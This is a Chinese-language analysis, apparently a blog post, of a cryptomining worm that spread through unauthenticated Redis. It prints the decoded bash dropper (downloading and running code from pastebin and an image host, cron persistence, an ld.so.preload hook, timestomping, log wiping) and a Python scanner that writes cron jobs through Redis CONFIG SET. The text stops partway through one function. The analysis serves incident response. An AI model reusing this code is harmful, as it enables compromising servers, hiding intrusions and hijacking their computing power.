针对Redis默认端口的挖矿脚本分析

起因

jpg

jpg

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

跟踪记录流水账

阿里云这截图的给出的命令行参数

/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh


直接看看这个链接的内容

jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

继续跟踪链接

curl https://pastebin.com/raw/uuYVPLXd

省略一堆经过base64编码的内容

解码一下

curl https://pastebin.com/raw/uuYVPLXd | base64 -d

#!/bin/bash
# Pinned interpreter and PATH for the rest of the script — presumably so the
# tools it relies on (curl, wget, netstat, pkill) resolve even when launched
# from cron's minimal environment.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

#######################################
# kills — "clear the field" stage: terminates competing miner families and
# deletes their artifacts so the CPU is free for this family's own miner
# (kworkerds, deployed by downloadrun). Runs with the privileges of whatever
# launched the loader (root, per the crontab lines written by echocron).
#######################################
function kills() {
pkill -f sourplum
# `ddg*` is unquoted: the shell expands it against the current directory
# before pkill sees it, so the match only behaves as intended when nothing
# in cwd matches the glob.
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg


# Paths left by other families. The analysis on this page does not establish
# what the /boot/grub entries are; the /tmp ones are described as apache
# backups and a rival miner (a7b104c270).
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270


# Kill every process whose full `ps auxf` line contains a rival pool host,
# port or path. This is a plain substring match on the whole line, so an
# unrelated process carrying the string in its arguments is killed as well.
ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9



# Process-name sweep. Several of these patterns are also the names of
# legitimate system daemons (irqbalance, polkitd, acpid) or kernel-thread
# look-alikes (kworker34); `pkill -f` matches the full command line, so those
# services die too — often the first symptom a responder notices.
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache



# Artifact cleanup: other families' drops, plus this family's own earlier
# drops (kworkerds and config.json under /tmp and /bin) ahead of
# re-deployment.
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json


# Kill the owner of any connection whose `netstat -anp` line contains these
# strings. `grep 3333` & co. match anywhere in the line (local port, remote
# port, even the PID column), so collateral kills are possible.
netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9



# y = number of running kworkerds processes (this family's miner). If none,
# whatever process currently owns a connection containing "13531" — the pool
# port seen in the config.json excerpt further down the page — is killed so
# the port is free for the miner.
y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

if [ ${y} -eq 0 ]; then
netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi



}

#######################################
# system — installs a second loader, /bin/httpdns (its content, a one-line
# curl|base64 -d|bash fetch, is shown later on the page), and schedules it in
# /etc/crontab. `sed -i '$d'` deletes the LAST line of /etc/crontab before
# appending, so an existing legitimate entry is silently lost. The schedule
# `* */6 * * *` fires every minute of every sixth hour (the minute field is
# `*`), not once every six hours.
# Detection: /bin/httpdns existing at all, and a root crontab line invoking it.
#######################################
function system() {
if [ ! -f "/bin/httpdns" ]; then
# curl -f leaves no file on an HTTP error, which is why the wget fallback
# re-checks for the file.
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
fi

}

#######################################
# top — hiding / anti-forensics stage. Downloads a shared object served under
# a ".jpg" name from an image host into /usr/local/lib/libntp.so and registers
# it in /etc/ld.so.preload, so the dynamic loader injects it into every
# dynamically linked process started afterwards. What the .so does is not
# shown on this page. It then timestomps its files and truncates logs that
# would record the intrusion.
# Detection: on most distributions /etc/ld.so.preload does not exist; any
# entry there, especially under /usr/local/lib, deserves a look.
#######################################
function top() {
if [ ! -f "/usr/local/lib/libntp.so" ]; then
# curl -f writes nothing on HTTP error, hence the re-check and wget fallback.
curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
if [ ! -f "/usr/local/lib/libntp.so" ]; then
wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
fi
fi
if [ ! -f "/etc/ld.so.preload" ]; then
echo /usr/local/lib/libntp.so >/etc/ld.so.preload
else
# `sed '$d'` deletes the LAST line of an existing preload file before
# appending — whatever entry was there (legitimate or a rival's) is lost.
sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
fi


# Timestomping: `-r /bin/sh` copies /bin/sh's access and modification times
# onto the dropped files so mtime-based searches (find -newer / -mtime) miss
# them. libjdk.so is touched but never created by this script — presumably
# dropped by another component; unconfirmed here.
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libjdk.so
touch -acmr /bin/sh /usr/local/lib/libntp.so


# Log wiping. Note the syntax: `0>file` is a redirection of fd 0, not the
# argument "0" — echo prints an empty line to stdout while the named file is
# opened for writing and thereby truncated. Net effect: the log is emptied.
echo 0>/var/spool/mail/root #root's mail spool
echo 0>/var/log/wtmp #login records
echo 0>/var/log/secure #authentication records
echo 0>/var/log/cron #cron log
}

#######################################
# python — launches the propagation component. The base64 blob is a small
# Python 2 loader (decoded further down the page) that fetches a pastebin
# paste, base64-decodes it and exec()s it; the decoded paste is the Redis
# scanner shown later. Output is discarded and the process is detached with
# nohup so it outlives the cron-spawned shell. /tmp/.tmpa is the
# "already launched" marker tested by the top-level code.
# Because this shell function is itself named `python`, a bare `python` call
# here would recurse; it only reaches the real interpreter because `nohup`
# (an external program) performs the PATH lookup.
#######################################
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}

#######################################
# echocron — cron persistence. Writes the same "fetch the pastebin loader and
# pipe it to sh" job into three locations so removing one is not enough:
#   /etc/cron.d/root              (system cron dir; has a user column: root)
#   /var/spool/cron/root          (per-user crontab, RHEL/CentOS layout)
#   /var/spool/cron/crontabs/root (per-user crontab, Debian/Ubuntu layout)
# Each file ends with a `##` comment line. Schedules: every 10 min, every
# 30 min, and every minute of every 10th hour (`* */10 * * *` — minute
# field is `*`). The files' timestamps are then copied from /bin/sh
# (timestomping), so `find -mtime` will not surface them.
# Detection: those three paths; a cron line that pipes curl into sh; a
# crontab whose mtime equals /bin/sh's.
#######################################
function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

#######################################
# downloadrun — miner deployment, /tmp variant. Skipped entirely when any
# `netstat -anp` line contains "13531" (the pool port in the config.json
# excerpt below), which the script treats as "miner already connected".
# Otherwise fetches the kworkerds binary, served under a .jpg name from an
# image host, into /tmp and starts it detached with output discarded.
# Note `ps` here is a shell variable, not the ps command.
#######################################
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
# curl -f writes nothing on HTTP error, hence the re-check and wget fallback.
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
# Binary already present: just (re)start it. Both branches end identically.
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}

#######################################
# downloadrunxm — miner deployment, /bin variant, used as a fallback when the
# /tmp variant did not produce a connection on 13531 after 10 s (see the
# top-level code). Drops a pool config as /bin/config.json (its content is
# excerpted further down the page) and a second kworkerds build as
# /bin/kworkerds, then starts it detached. `chmod +x` on the JSON file is
# meaningless — presumably a copy-paste of the binary branch.
#######################################
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ]; then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
# curl -f writes nothing on HTTP error, hence the re-check and wget fallback.
curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}

# Entry point. A pastebin paste acts as a remote upgrade switch: when it reads
# exactly "update", the current drops are deleted and only the cron persistence
# is refreshed (so the next cron run redeploys fresh files); the page shows it
# returned "noupdate" at analysis time. The `${update}x = "update"x` idiom
# keeps `[` from seeing an empty operand when curl fails; it would still break
# on a value containing whitespace since the expansion is unquoted.
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
# First run only (marker /tmp/.tmpa absent): launch the Redis scanner.
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi
# Order: kill rivals, deploy miner, persist via cron, install the httpdns
# loader, install the ld.so.preload hook and wipe logs, then after 10 s check
# for a pool connection; if none, deploy the /bin variant with config.json.
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi
fi
#
#

function有点多,用Atom折叠下。

jpg

update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
.
.
.
fi

脚本执行的第一步就是根据update返回值确定是不是要更新。

现在我这个时间点去访问,是noupdate

curl https://pastebin.com/raw/C4ZhQFrH

noupdate

# The "update" branch: every location the miner and its config are dropped
# into (/tmp, /bin, /root) is wiped so that the next cron run redeploys.
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds

用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。

看看这个echocron的function干了啥

#######################################
# echocron (excerpt repeated from the full script above) — cron persistence
# in three locations: system cron dir (/etc/cron.d), RHEL-style and
# Debian-style per-user crontab spools. All three re-fetch the same pastebin
# loader and pipe it to sh; the `touch -acmr /bin/sh` lines copy /bin/sh's
# timestamps onto the files so mtime-based searches do not surface them.
#######################################
function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。

留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。

/etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs
/var/spool/cron/crontabs/root

上面的文件还使用touch -acmr改掉了时间戳,改成与/bin/sh相同的时间,多半是为了防止运维用find按修改时间把它们找出来。


# First-run gate: /tmp/.tmpa is created by the `python` function after it has
# launched the scanner, so this block runs once per host unless the marker is
# removed.
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi

判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。

怀疑.tmp对于apache有较大影响。

#######################################
# python (excerpt repeated from the full script above) — starts a detached
# Python 2 process that exec()s the base64-embedded loader decoded just
# below, then drops the /tmp/.tmpa "already launched" marker. The inner
# `python` resolves to the real interpreter only because `nohup`, an external
# program, does the PATH lookup — a bare call would hit this function again.
#######################################
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}

这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。

现在看看这个python脚本运行的是啥子

先做一次base64解码

#coding: utf-8
# Stage-2 loader executed by the shell `python` function: downloads a pastebin
# paste, base64-decodes it and exec()s the result (Python 2 — urllib.urlopen).
# The bare `except: pass` swallows every failure (no network, paste removed,
# decode error), so nothing is logged. The decoded paste is shown next.
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
curl https://pastebin.com/raw/nYBpuAxT | base64 -d

实际上他要运行的脚本就是这个

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

# Global target list: filled by get_ip_list(), consumed by runPortscan().
IP_LIST = []

# (Indentation of this listing was lost in extraction; comments are added in
# place without restoring it.)
# One thread per target host. Class-level shared state: tlist (live threads),
# maxthreads (concurrency cap), evnt (wake-up signal for the throttle in
# runPortscan), lck (guards tlist).
class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()

def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
# Propagation step against an unauthenticated Redis on 6379: the cron line is
# stored as an ordinary value, then CONFIG SET dir/dbfilename + SAVE make the
# server dump its dataset to /etc/cron.d/root, which cron parses (the junk
# bytes around the entry are tolerated by cron as garbage lines). A Redis that
# requires auth (requirepass), is bound to loopback / has protected-mode on,
# or has CONFIG renamed away (rename-command) does not accept this. Every
# error is swallowed by the except below, so the scan is silent.
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
except Exception:
pass
# Deregister and, if a slot is now free, pulse evnt to wake runPortscan.
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()

# Registers a new scanner in tlist under the lock, then starts it.
def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()

# Pre-decorator (Python 2) spelling of @staticmethod.
newthread = staticmethod(newthread)

# Builds the target list: asks ident.me for this host's public IP and
# enumerates the surrounding /16. The regex `\d+.\d+.` leaves the dots
# unescaped (they match any character), so it loosely captures the first two
# octets plus the trailing dot. range(0, 255) stops at 254, so .255 hosts are
# never generated. `req` is unused — HTTPConnection.request returns None.
# Any failure (no network, unexpected body) is swallowed and IP_LIST stays
# empty, in which case runPortscan does nothing.
def get_ip_list():
try:
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))
except Exception:
pass

# Drives the scan: one scanner thread per address in IP_LIST, throttled to
# scanner.maxthreads. When the cap is reached it releases the lock and blocks
# on evnt until a finishing thread pulses it; note newthread() is then called
# regardless, so the wait is only a pause, not a hard limit. Finally joins all
# threads still registered (the list is being mutated by finishing threads,
# so this iteration is racy).
def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()

# Entry point when run as a script (the shell loader exec()s it in-process,
# where __name__ is also "__main__").
if __name__ == "__main__":
runPortscan()

粗略地看了两下,就是一个扫Redis默认端口并且传播挖矿脚本的操作。

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))

继续往下看

# Main sequence of the non-update branch (excerpt): kill rivals, deploy the
# miner to /tmp, persist via cron, install the httpdns loader, install the
# ld.so.preload hook and wipe logs, then after 10 s check for a connection on
# the pool port; if none, fall back to the /bin variant with config.json.
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
downloadrunxm
fi

看看这个kills的function干了啥

开始的两行就很interesting了,先把同行的挖矿给干了。

# Rival-miner cleanup (excerpt). `ddg*` is an unquoted glob and is expanded by
# the shell against the current directory before pkill sees it.
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

第一行是干掉sourplum

第二行是干掉wnTKYg;ddg则是在wnTKYg死掉后负责把它重新拉起来的组件。

# Artifact removal (excerpt). The purpose of the /boot/grub entries is not
# established on this page; the /tmp patterns are apache backups and a rival
# miner (a7b104c270).
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270

不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。

后几行都是删掉了apache的备份。

最后一行,a7b104c270,这个是挖矿的。

整个kill的function看下来,都是针对于apache和挖矿恶意程序。

跟这次比较相关就下面这些

# Self-cleanup before redeployment, then: if no kworkerds process is running,
# kill whichever process owns a connection whose netstat line contains 13531
# (the pool port from config.json) so the miner can reuse it. The grep is a
# substring match on the whole line, so unrelated processes can be hit.
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

if [ ${y} -eq 0 ]; then
netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi

从这几行基本可以判定,kworkerds这就是他的挖矿程序。

要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。

把后面遇到的config.json拿到这里来,就很清晰了。

"url": "stratum+tcp://xmr.f2pool.com:13531",

看看这个downloadrun的function干了啥

#######################################
# downloadrun (excerpt repeated from the full script) — if no netstat line
# contains the pool port 13531, fetch the kworkerds binary (served as a .jpg
# from an image host) into /tmp and start it detached. `ps` is a shell
# variable here, not the command.
#######################################
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}

thyrsi.com,一个图床站。

这里稍微做了下伪装。

kworkerds下到/tmp,并且运行。

这个下载链接在国内速度真是好差,这可能就是为啥在这次入侵的机子上面找不到这个程序的问题emmm。

但是在海外下载是没有问题的。

root@659b8ee8ecf6:/# chmod 777 kworkerds
root@659b8ee8ecf6:/# ./kworkerds
[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
[2018-09-03 18:31:59] : Dev pool connected. Logging in...
[2018-09-03 18:32:01] : Pool logged in.

在容器上面跑了一下,确实的一个挖矿的程序。CPU一下子就上天了。

docker diff debian

C /tmp
A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
A /kworkerds

在输出的文件里面/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa

"pool_list" :
[
{"pool_address" : "xmr.f2pool.com:13531",
"wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
"rig_id" : "",
"pool_password" : "",
"use_nicehash" : false,
"use_tls" : false,
"tls_fingerprint" : "",
"pool_weight" : 1
},
],

这个应该是一个已经封装好挖矿程序(挖矿的地址和矿池都写好了),开箱即用。2333

哪怕没有下载后面的config.json都能够跑。



看看这个system的function干了啥

#######################################
# system (excerpt repeated from the full script) — drops the httpdns loader
# into /bin and hooks it into /etc/crontab. `sed -i '$d'` removes the last
# existing line of /etc/crontab before appending; `* */6 * * *` runs every
# minute of every sixth hour, not once per six hours.
#######################################
function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
fi

}

先看看这个链接是啥玩儿

curl https://pastebin.com/raw/698D7kZU

/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

又需要你再获取再解码,他不烦吗?

最后得到下面的内容

#!/bin/sh
# Same pinned interpreter/PATH as the first script — presumably so curl,
# wget, netstat and chkconfig resolve from cron's minimal environment.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

#######################################
# downloadrun (httpdns variant) — identical to the first script's version
# except for `--connect-timeout 120` on the curl fetch. If no netstat line
# contains the pool port 13531, fetch the kworkerds binary into /tmp and
# start it detached. `ps` is a shell variable, not the command.
#######################################
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ]; then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}

#######################################
# downloadrunxm (httpdns variant) — fallback deployment to /bin with a
# separate pool config (/bin/config.json). Same logic as the first script's
# version, plus `--connect-timeout 120` on the curl fetches. `chmod +x` on the
# JSON file is meaningless — presumably copied from the binary branch.
#######################################
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
